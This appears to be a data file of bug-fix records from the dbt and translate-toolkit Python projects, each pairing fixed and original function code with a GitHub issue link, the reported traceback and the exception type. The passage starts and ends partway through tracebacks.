File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def create_macro_capture_env(node):
class ParserMacroCapture(jinja2.Undefined):
"""
This class sets up the parser to capture macros.
"""
def __init__(self, hint=None, obj=None, name=None, exc=None):
super(jinja2.Undefined, self).__init__()
self.node = node
self.name = name
self.package_name = node.get("package_name")
# jinja uses these for safety, so we have to override them.
# see https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py#L332-L339 # noqa
self.unsafe_callable = False
self.alters_data = False
def __deepcopy__(self, memo):
path = os.path.join(
self.node.get("root_path"), self.node.get("original_file_path")
)
logger.debug(
"A ParserMacroCapture has been deecopy()d, invalid reference "
'to "{}" in node {}.{} (source path: {})'.format(
self.name,
self.node.get("package_name"),
self.node.get("name"),
path,
)
)
dbt.exceptions.raise_compiler_error(
"dbt has detected at least one invalid reference in {}.{}. "
"Check logs for more information".format(
self.node.get("package_name"), self.node.get("name")
)
)
def __getattr__(self, name):
if name == "name" or _is_dunder_name(name):
raise AttributeError(
"'{}' object has no attribute '{}'".format(
type(self).__name__, name
)
)
self.package_name = self.name
self.name = name
return self
def __call__(self, *args, **kwargs):
return True
return ParserMacroCapture
|
def create_macro_capture_env(node):
class ParserMacroCapture(jinja2.Undefined):
"""
This class sets up the parser to capture macros.
"""
def __init__(self, hint=None, obj=None, name=None, exc=None):
super(jinja2.Undefined, self).__init__()
self.node = node
self.name = name
self.package_name = node.get("package_name")
def __getattr__(self, name):
# jinja uses these for safety, so we have to override them.
# see https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py#L332-L339 # noqa
if name in ["unsafe_callable", "alters_data"]:
return False
self.package_name = self.name
self.name = name
return self
def __call__(self, *args, **kwargs):
return True
return ParserMacroCapture
|
https://github.com/fishtown-analytics/dbt/issues/1080
|
(MainThread): maximum recursion depth exceeded in comparison
2018-10-22 16:36:31,926 (MainThread): Traceback (most recent call last):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 72, in main
results, succeeded = handle_and_check(args)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 117, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 172, in run_from_args
results = run_from_task(task, proj, parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 180, in run_from_task
result = task.run()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/task/run.py", line 26, in run
results = runner.run(query, ModelRunner)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 244, in run
return self.run_from_graph(Selector, Runner, query)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 197, in run_from_graph
manifest, linker = self.compile(self.project)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 186, in compile
return compiler.compile()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/compilation.py", line 241, in compile
manifest = dbt.loader.GraphLoader.load_all(self.project, all_projects)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 21, in load_all
nodes.update(loader.load_all(root_project, all_projects, macros))
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 86, in load_all
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 102, in load_project
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 67, in load_and_parse
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 95, in parse_sql_nodes
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base.py", line 125, in parse_node
schema_override = config.config.get('schema')
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 82, in config
self.in_model_config)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 50, in _merge
merged_config.copy(), config.copy()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/utils.py", line 251, in deep_merge
last = copy.deepcopy(lst.pop(len(lst)-1))
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 150, in deepcopy
y = copier(x, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 240, in _deepcopy_dict
y[deepcopy(key, memo)] = deepcopy(value, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 180, in deepcopy
y = _reconstruct(x, memo, *rv)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 281, in _reconstruct
if hasattr(y, '__setstate__'):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
[Previous line repeated 320 more times]
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 162, in __getattr__
if name in ['unsafe_callable', 'alters_data']:
RecursionError: maximum recursion depth exceeded in comparison
|
RecursionError
|
def __init__(self, hint=None, obj=None, name=None, exc=None):
super(jinja2.Undefined, self).__init__()
self.node = node
self.name = name
self.package_name = node.get("package_name")
# jinja uses these for safety, so we have to override them.
# see https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py#L332-L339 # noqa
self.unsafe_callable = False
self.alters_data = False
|
def __init__(self, hint=None, obj=None, name=None, exc=None):
super(jinja2.Undefined, self).__init__()
self.node = node
self.name = name
self.package_name = node.get("package_name")
|
https://github.com/fishtown-analytics/dbt/issues/1080
|
(MainThread): maximum recursion depth exceeded in comparison
2018-10-22 16:36:31,926 (MainThread): Traceback (most recent call last):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 72, in main
results, succeeded = handle_and_check(args)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 117, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 172, in run_from_args
results = run_from_task(task, proj, parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 180, in run_from_task
result = task.run()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/task/run.py", line 26, in run
results = runner.run(query, ModelRunner)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 244, in run
return self.run_from_graph(Selector, Runner, query)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 197, in run_from_graph
manifest, linker = self.compile(self.project)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 186, in compile
return compiler.compile()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/compilation.py", line 241, in compile
manifest = dbt.loader.GraphLoader.load_all(self.project, all_projects)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 21, in load_all
nodes.update(loader.load_all(root_project, all_projects, macros))
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 86, in load_all
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 102, in load_project
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 67, in load_and_parse
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 95, in parse_sql_nodes
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base.py", line 125, in parse_node
schema_override = config.config.get('schema')
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 82, in config
self.in_model_config)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 50, in _merge
merged_config.copy(), config.copy()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/utils.py", line 251, in deep_merge
last = copy.deepcopy(lst.pop(len(lst)-1))
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 150, in deepcopy
y = copier(x, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 240, in _deepcopy_dict
y[deepcopy(key, memo)] = deepcopy(value, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 180, in deepcopy
y = _reconstruct(x, memo, *rv)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 281, in _reconstruct
if hasattr(y, '__setstate__'):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
[Previous line repeated 320 more times]
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 162, in __getattr__
if name in ['unsafe_callable', 'alters_data']:
RecursionError: maximum recursion depth exceeded in comparison
|
RecursionError
|
def __getattr__(self, name):
if name == "name" or _is_dunder_name(name):
raise AttributeError(
"'{}' object has no attribute '{}'".format(type(self).__name__, name)
)
self.package_name = self.name
self.name = name
return self
|
def __getattr__(self, name):
# jinja uses these for safety, so we have to override them.
# see https://github.com/pallets/jinja/blob/master/jinja2/sandbox.py#L332-L339 # noqa
if name in ["unsafe_callable", "alters_data"]:
return False
self.package_name = self.name
self.name = name
return self
|
https://github.com/fishtown-analytics/dbt/issues/1080
|
(MainThread): maximum recursion depth exceeded in comparison
2018-10-22 16:36:31,926 (MainThread): Traceback (most recent call last):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 72, in main
results, succeeded = handle_and_check(args)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 117, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 172, in run_from_args
results = run_from_task(task, proj, parsed)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/main.py", line 180, in run_from_task
result = task.run()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/task/run.py", line 26, in run
results = runner.run(query, ModelRunner)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 244, in run
return self.run_from_graph(Selector, Runner, query)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 197, in run_from_graph
manifest, linker = self.compile(self.project)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/runner.py", line 186, in compile
return compiler.compile()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/compilation.py", line 241, in compile
manifest = dbt.loader.GraphLoader.load_all(self.project, all_projects)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 21, in load_all
nodes.update(loader.load_all(root_project, all_projects, macros))
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 86, in load_all
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/loader.py", line 102, in load_project
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 67, in load_and_parse
macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base_sql.py", line 95, in parse_sql_nodes
macros=macros)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/parser/base.py", line 125, in parse_node
schema_override = config.config.get('schema')
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 82, in config
self.in_model_config)
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/model.py", line 50, in _merge
merged_config.copy(), config.copy()
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/utils.py", line 251, in deep_merge
last = copy.deepcopy(lst.pop(len(lst)-1))
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 150, in deepcopy
y = copier(x, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 240, in _deepcopy_dict
y[deepcopy(key, memo)] = deepcopy(value, memo)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 180, in deepcopy
y = _reconstruct(x, memo, *rv)
File "/Users/azme/anaconda3/lib/python3.6/copy.py", line 281, in _reconstruct
if hasattr(y, '__setstate__'):
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 165, in __getattr__
self.package_name = self.name
[Previous line repeated 320 more times]
File "/Users/azme/anaconda3/lib/python3.6/site-packages/dbt/clients/jinja.py", line 162, in __getattr__
if name in ['unsafe_callable', 'alters_data']:
RecursionError: maximum recursion depth exceeded in comparison
|
RecursionError
|
def get_catalog(cls, profile, project_cfg, manifest):
try:
table = cls.run_operation(
profile, project_cfg, manifest, GET_CATALOG_OPERATION_NAME
)
finally:
cls.release_connection(profile, GET_CATALOG_OPERATION_NAME)
results = table.where(_filter_schemas(manifest))
return results
|
def get_catalog(cls, profile, project_cfg, manifest):
try:
table = cls.run_operation(
profile, project_cfg, manifest, GET_CATALOG_OPERATION_NAME
)
finally:
cls.release_connection(profile, GET_CATALOG_OPERATION_NAME)
schemas = list({node.schema.lower() for node in manifest.nodes.values()})
results = table.where(lambda r: r["table_schema"].lower() in schemas)
return results
|
https://github.com/fishtown-analytics/dbt/issues/980
|
from svv_table_info
DEBUG:dbt:SQL status: SELECT in 2.90 seconds
DEBUG:dbt:On get_catalog_data: ROLLBACK
DEBUG:dbt:Flushing usage events
Encountered an error:
INFO:dbt:Encountered an error:
'NoneType' object has no attribute 'lower'
INFO:dbt:'NoneType' object has no attribute 'lower'
DEBUG:dbt:Traceback (most recent call last):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/main.py", line 72, in main
results, succeeded = handle_and_check(args)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/main.py", line 117, in handle_and_check
task, res = run_from_args(parsed)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/main.py", line 172, in run_from_args
results = run_from_task(task, proj, parsed)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/main.py", line 180, in run_from_task
result = task.run()
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/task/generate.py", line 217, in run
results = adapter.get_catalog(profile, self.project.cfg, manifest)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/adapters/default/impl.py", line 838, in get_catalog
results = table.where(lambda r: r['table_schema'].lower() in schemas)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/agate/table/where.py", line 25, in where
if test(row):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dbt/adapters/default/impl.py", line 838, in <lambda>
results = table.where(lambda r: r['table_schema'].lower() in schemas)
AttributeError: 'NoneType' object has no attribute 'lower'
|
AttributeError
|
def print_start_line(node, schema_name, index, total):
if node.get("resource_type") == NodeType.Model:
print_model_start_line(node, schema_name, index, total)
if node.get("resource_type") == NodeType.Test:
print_test_start_line(node, schema_name, index, total)
if node.get("resource_type") == NodeType.Archive:
print_archive_start_line(node, index, total)
|
def print_start_line(node, schema_name, index, total):
if node.get("resource_type") == NodeType.Model:
print_model_start_line(node, schema_name, index, total)
if node.get("resource_type") == NodeType.Test:
print_test_start_line(node, schema_name, index, total)
|
https://github.com/fishtown-analytics/dbt/issues/252
|
(venv)Tristans-MacBook-Pro:analytics tristan$ dbt archive
Traceback (most recent call last):
File "/Users/tristan/dev/venv/bin/dbt", line 6, in <module>
exec(compile(open(__file__).read(), __file__, 'exec'))
File "/Users/tristan/dev/dbt/scripts/dbt", line 8, in <module>
dbt.main.main(sys.argv[1:])
File "/Users/tristan/dev/dbt/dbt/main.py", line 38, in main
return handle(args)
File "/Users/tristan/dev/dbt/dbt/main.py", line 52, in handle
res = run_from_args(parsed)
File "/Users/tristan/dev/dbt/dbt/main.py", line 85, in run_from_args
return task.run()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 19, in run
self.compile()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 15, in compile
compiled = compiler.compile_archives()
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 412, in compile_archives
sql = archive.compile()
File "/Users/tristan/dev/dbt/dbt/model.py", line 705, in compile
query = archival.compile()
File "/Users/tristan/dev/dbt/dbt/archival.py", line 41, in compile
self.schema.create_table(target_schema, target_table, dest_columns, sort=updated_at, dist=unique_key)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 257, in create_table
self.execute_and_handle_permissions(sql, table)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 159, in execute_and_handle_permissions
return self.execute(query)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 137, in execute
raise e
File "/Users/tristan/dev/dbt/dbt/schema.py", line 129, in execute
cursor.execute(sql)
psycopg2.NotSupportedError: column "_sdc_source_key__id || '|' || _sdc_level_0_id" specified as distkey/sortkey is not in the table "mongo.accounts__duplicate_authors"
|
psycopg2.NotSupportedError
|
def print_result_line(result, schema_name, index, total):
node = result.node
if node.get("resource_type") == NodeType.Model:
print_model_result_line(result, schema_name, index, total)
elif node.get("resource_type") == NodeType.Test:
print_test_result_line(result, schema_name, index, total)
elif node.get("resource_type") == NodeType.Archive:
print_archive_result_line(result, index, total)
|
def print_result_line(result, schema_name, index, total):
node = result.node
if node.get("resource_type") == NodeType.Model:
print_model_result_line(result, schema_name, index, total)
elif node.get("resource_type") == NodeType.Test:
print_test_result_line(result, schema_name, index, total)
|
https://github.com/fishtown-analytics/dbt/issues/252
|
(venv)Tristans-MacBook-Pro:analytics tristan$ dbt archive
Traceback (most recent call last):
File "/Users/tristan/dev/venv/bin/dbt", line 6, in <module>
exec(compile(open(__file__).read(), __file__, 'exec'))
File "/Users/tristan/dev/dbt/scripts/dbt", line 8, in <module>
dbt.main.main(sys.argv[1:])
File "/Users/tristan/dev/dbt/dbt/main.py", line 38, in main
return handle(args)
File "/Users/tristan/dev/dbt/dbt/main.py", line 52, in handle
res = run_from_args(parsed)
File "/Users/tristan/dev/dbt/dbt/main.py", line 85, in run_from_args
return task.run()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 19, in run
self.compile()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 15, in compile
compiled = compiler.compile_archives()
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 412, in compile_archives
sql = archive.compile()
File "/Users/tristan/dev/dbt/dbt/model.py", line 705, in compile
query = archival.compile()
File "/Users/tristan/dev/dbt/dbt/archival.py", line 41, in compile
self.schema.create_table(target_schema, target_table, dest_columns, sort=updated_at, dist=unique_key)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 257, in create_table
self.execute_and_handle_permissions(sql, table)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 159, in execute_and_handle_permissions
return self.execute(query)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 137, in execute
raise e
File "/Users/tristan/dev/dbt/dbt/schema.py", line 129, in execute
cursor.execute(sql)
psycopg2.NotSupportedError: column "_sdc_source_key__id || '|' || _sdc_level_0_id" specified as distkey/sortkey is not in the table "mongo.accounts__duplicate_authors"
|
psycopg2.NotSupportedError
|
def execute_archive(profile, node, context):
adapter = get_adapter(profile)
node_cfg = node.get("config", {})
source_columns = adapter.get_columns_in_table(
profile, node_cfg.get("source_schema"), node_cfg.get("source_table")
)
if len(source_columns) == 0:
source_schema = node_cfg.get("source_schema")
source_table = node_cfg.get("source_table")
raise RuntimeError(
'Source table "{}"."{}" does not exist'.format(source_schema, source_table)
)
dest_columns = source_columns + [
dbt.schema.Column("valid_from", "timestamp", None),
dbt.schema.Column("valid_to", "timestamp", None),
dbt.schema.Column("scd_id", "text", None),
dbt.schema.Column("dbt_updated_at", "timestamp", None),
]
adapter.create_table(
profile,
schema=node_cfg.get("target_schema"),
table=node_cfg.get("target_table"),
columns=dest_columns,
sort="dbt_updated_at",
dist="scd_id",
)
# TODO move this to inject_runtime_config, generate archive SQL
# in wrap step. can't do this right now because we actually need
# to inspect status of the schema at runtime and archive requires
# a lot of information about the schema to generate queries.
template_ctx = context.copy()
template_ctx.update(node_cfg)
select = dbt.clients.jinja.get_rendered(
dbt.templates.SCDArchiveTemplate, template_ctx
)
insert_stmt = dbt.templates.ArchiveInsertTemplate().wrap(
schema=node_cfg.get("target_schema"),
table=node_cfg.get("target_table"),
query=select,
unique_key=node_cfg.get("unique_key"),
)
node["wrapped_sql"] = dbt.clients.jinja.get_rendered(insert_stmt, template_ctx)
result = adapter.execute_model(profile=profile, model=node)
return result
|
def execute_archive(profile, node, context):
adapter = get_adapter(profile)
node_cfg = node.get("config", {})
source_columns = adapter.get_columns_in_table(
profile, node_cfg.get("source_schema"), node_cfg.get("source_table")
)
if len(source_columns) == 0:
raise RuntimeError(
'Source table "{}"."{}" does not exist'.format(source_schema, source_table)
)
dest_columns = source_columns + [
dbt.schema.Column("valid_from", "timestamp", None),
dbt.schema.Column("valid_to", "timestamp", None),
dbt.schema.Column("scd_id", "text", None),
dbt.schema.Column("dbt_updated_at", "timestamp", None),
]
adapter.create_table(
profile,
schema=node_cfg.get("target_schema"),
table=node_cfg.get("target_table"),
columns=dest_columns,
sort=node_cfg.get("updated_at"),
dist=node_cfg.get("unique_key"),
)
# TODO move this to inject_runtime_config, generate archive SQL
# in wrap step. can't do this right now because we actually need
# to inspect status of the schema at runtime and archive requires
# a lot of information about the schema to generate queries.
template_ctx = context.copy()
template_ctx.update(node_cfg)
select = dbt.clients.jinja.get_rendered(
dbt.templates.SCDArchiveTemplate, template_ctx
)
insert_stmt = dbt.templates.ArchiveInsertTemplate().wrap(
schema=node_cfg.get("target_schema"),
table=node_cfg.get("target_table"),
query=select,
unique_key=node_cfg.get("unique_key"),
)
node["wrapped_sql"] = dbt.clients.jinja.get_rendered(insert_stmt, template_ctx)
result = adapter.execute_model(profile=profile, model=node)
return result
|
https://github.com/fishtown-analytics/dbt/issues/252
|
(venv)Tristans-MacBook-Pro:analytics tristan$ dbt archive
Traceback (most recent call last):
File "/Users/tristan/dev/venv/bin/dbt", line 6, in <module>
exec(compile(open(__file__).read(), __file__, 'exec'))
File "/Users/tristan/dev/dbt/scripts/dbt", line 8, in <module>
dbt.main.main(sys.argv[1:])
File "/Users/tristan/dev/dbt/dbt/main.py", line 38, in main
return handle(args)
File "/Users/tristan/dev/dbt/dbt/main.py", line 52, in handle
res = run_from_args(parsed)
File "/Users/tristan/dev/dbt/dbt/main.py", line 85, in run_from_args
return task.run()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 19, in run
self.compile()
File "/Users/tristan/dev/dbt/dbt/task/archive.py", line 15, in compile
compiled = compiler.compile_archives()
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 412, in compile_archives
sql = archive.compile()
File "/Users/tristan/dev/dbt/dbt/model.py", line 705, in compile
query = archival.compile()
File "/Users/tristan/dev/dbt/dbt/archival.py", line 41, in compile
self.schema.create_table(target_schema, target_table, dest_columns, sort=updated_at, dist=unique_key)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 257, in create_table
self.execute_and_handle_permissions(sql, table)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 159, in execute_and_handle_permissions
return self.execute(query)
File "/Users/tristan/dev/dbt/dbt/schema.py", line 137, in execute
raise e
File "/Users/tristan/dev/dbt/dbt/schema.py", line 129, in execute
cursor.execute(sql)
psycopg2.NotSupportedError: column "_sdc_source_key__id || '|' || _sdc_level_0_id" specified as distkey/sortkey is not in the table "mongo.accounts__duplicate_authors"
|
psycopg2.NotSupportedError
|
def do_compile(self):
schema_tests = []
for model_name, constraint_blob in self.schema.items():
constraints = constraint_blob.get("constraints", {})
for constraint_type, constraint_data in constraints.items():
if constraint_data is None:
compiler_error(
self,
"no constraints given to test: '{}.{}'".format(
model_name, constraint_type
),
)
for params in constraint_data:
schema_test_klass = self.get_test(constraint_type)
schema_test = schema_test_klass(
self.project,
self.og_target_dir,
self.rel_filepath,
model_name,
params,
)
schema_tests.append(schema_test)
return schema_tests
|
def do_compile(self):
schema_tests = []
for model_name, constraint_blob in self.schema.items():
constraints = constraint_blob.get("constraints", {})
for constraint_type, constraint_data in constraints.items():
for params in constraint_data:
schema_test_klass = self.get_test(constraint_type)
schema_test = schema_test_klass(
self.project,
self.og_target_dir,
self.rel_filepath,
model_name,
params,
)
schema_tests.append(schema_test)
return schema_tests
|
https://github.com/fishtown-analytics/dbt/issues/240
|
Traceback (most recent call last):
File "/Users/tristan/dev/venv/bin/dbt", line 6, in <module>
exec(compile(open(__file__).read(), __file__, 'exec'))
File "/Users/tristan/dev/dbt/scripts/dbt", line 8, in <module>
dbt.main.main(sys.argv[1:])
File "/Users/tristan/dev/dbt/dbt/main.py", line 41, in main
handle(args)
File "/Users/tristan/dev/dbt/dbt/main.py", line 143, in handle
task.run()
File "/Users/tristan/dev/dbt/dbt/task/run.py", line 28, in run
graph_type = self.compile()
File "/Users/tristan/dev/dbt/dbt/task/run.py", line 20, in compile
results = compiler.compile(self.args.dry)
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 399, in compile
written_schema_tests = self.compile_schema_tests(linker)
File "/Users/tristan/dev/dbt/dbt/compilation.py", line 324, in compile_schema_tests
schema_tests.extend(schema.compile()) # compiling a SchemaFile returns >= 0 SchemaTest models
File "/Users/tristan/dev/dbt/dbt/model.py", line 556, in compile
for params in constraint_data:
TypeError: 'NoneType' object is not iterable
|
TypeError
|
def dosetup(name, version, packages, datafiles, scripts, ext_modules=[]):
description, long_description = __doc__.split("\n", 1)
kwargs = {}
if py2exe:
kwargs["distclass"] = TranslateDistribution
setup(
name=name,
version=version,
license="GNU General Public License (GPL)",
description=description,
long_description=long_description,
author="Translate",
author_email="translate-devel@lists.sourceforge.net",
url="http://toolkit.translatehouse.org/",
download_url="https://github.com/translate/translate/releases/tag/" + version,
project_urls={
"Issue Tracker": "https://github.com/translate/translate/issues",
"Documentation": "http://docs.translatehouse.org/projects/translate-toolkit/",
},
platforms=["any"],
classifiers=classifiers,
packages=packages,
data_files=datafiles,
entry_points={
"console_scripts": translatescripts,
},
scripts=scripts,
ext_modules=ext_modules,
cmdclass=cmdclass,
install_requires=parse_requirements("requirements/required.txt"),
**kwargs,
)
|
def dosetup(name, version, packages, datafiles, scripts, ext_modules=[]):
from setuptools import setup
description, long_description = __doc__.split("\n", 1)
kwargs = {}
if py2exe:
kwargs["distclass"] = TranslateDistribution
setup(
name=name,
version=version,
license="GNU General Public License (GPL)",
description=description,
long_description=long_description,
author="Translate",
author_email="translate-devel@lists.sourceforge.net",
url="http://toolkit.translatehouse.org/",
download_url="https://github.com/translate/translate/releases/tag/" + version,
project_urls={
"Issue Tracker": "https://github.com/translate/translate/issues",
"Documentation": "http://docs.translatehouse.org/projects/translate-toolkit/",
},
platforms=["any"],
classifiers=classifiers,
packages=packages,
data_files=datafiles,
entry_points={
"console_scripts": translatescripts,
},
scripts=scripts,
ext_modules=ext_modules,
cmdclass=cmdclass,
install_requires=parse_requirements("requirements/required.txt"),
**kwargs,
)
|
https://github.com/translate/translate/issues/3958
|
Traceback (most recent call last):
File "setup.py", line 526, in <module>
standardsetup("translate-toolkit", translateversion)
File "setup.py", line 486, in standardsetup
translatebashscripts)
File "setup.py", line 490, in dosetup
from setuptools import setup
File "C:\Python27\lib\site-packages\setuptools\__init__.py", line 20, in <module>
from setuptools.dist import Distribution, Feature
File "C:\Python27\lib\site-packages\setuptools\dist.py", line 336, in <module>
_Distribution = get_unpatched(distutils.core.Distribution)
File "C:\Python27\lib\site-packages\setuptools\monkey.py", line 44, in get_unpatched
return lookup(item)
File "C:\Python27\lib\site-packages\setuptools\monkey.py", line 61, in get_unpatched_class
raise AssertionError(msg)
AssertionError: distutils has already been patched by <class py2exe.Distribution at 0x047BBF48>
|
AssertionError
|
def finalizetempoutputfile(self, options, outputfile, fulloutputpath):
"""Write the temp outputfile to its final destination."""
outputfile.seek(0, 0)
outputstring = outputfile.read()
outputfile = self.openoutputfile(options, fulloutputpath)
outputfile.write(outputstring)
outputfile.close()
|
def finalizetempoutputfile(self, options, outputfile, fulloutputpath):
"""Write the temp outputfile to its final destination."""
outputfile.reset()
outputstring = outputfile.read()
outputfile = self.openoutputfile(options, fulloutputpath)
outputfile.write(outputstring)
outputfile.close()
|
https://github.com/translate/translate/issues/3419
|
$ pot2po --errorlevel=traceback -t af templates af
pot2po: WARNING: writing to temporary output... 9%
pot2po: WARNING: Error processing: input templates/browser/chrome/overrides/appstrings.properties.pot, output af/browser/chrome/overrides/appstrings.properties.po, template af/browser/chrome/overrides/appstrings.properties.po: Traceback (most recent call last):
File "/Users/dwayne/dev/toolkit/translate/misc/optrecurse.py", line 508, in recursiveprocess
fulltemplatepath)
